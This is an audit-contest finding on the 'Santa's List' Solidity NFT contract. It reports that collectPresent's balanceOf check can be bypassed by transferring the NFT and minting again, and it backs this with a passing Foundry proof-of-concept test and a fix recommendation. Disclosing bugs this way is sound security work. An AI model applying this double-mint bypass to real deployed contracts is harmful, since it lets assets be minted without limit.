First Flight #5: Santa's List

First Flight #5

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Incorrect validation of NFT balance allows malicious users to mint more than once

wafflemakr

Summary

Incorrect validation of NFT balance allows malicious users to mint more than once

Vulnerability Details

SantasList::collectPresent incorrectly validates that the sender has no NFT balance in their wallets, to detect if they have already minted, by checking if the balance of the sender is not 0. A malicious user can mint an NFT, transfer it to another address and then mint again. The incorrect function validation will let this go by.

PoC

function testMintPresentMoreThanOnce() public {

// before

vm.prank(santa);

santasList.checkList(user, SantasList.Status.EXTRA_NICE);

vm.prank(santa);

santasList.checkTwice(user, SantasList.Status.EXTRA_NICE);

// when

vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);

vm.prank(user);

santasList.collectPresent();

// cant collect, already has one in balance

vm.prank(user);

vm.expectRevert();

santasList.collectPresent();

// transfer NFT to user2

vm.prank(user);

santasList.transferFrom(user, user2, 0);

// Collect present again

vm.prank(user);

santasList.collectPresent();

}

Output:

forge test --mt testMintPresentMoreThanOnce -vv

[⠒] Compiling...

No files changed, compilation skipped

Running 1 test for test/unit/SantasListTest.t.sol:SantasListTest

[PASS] testMintPresentMoreThanOnce() (gas: 248903)

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.97ms

Impact

HIGH. User's can mint infinite amount of NFTs

Tools Used

Manual Review
Foundry

Recommendations

Add a mapping that stores if an address has already claimed the present NFT. Alternatively, prevent users from transferring NFTs, so the balanceOf check can be valid.

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

Weak Already Collected Check

Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.

Rewards breakdown

nSLOC

116

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.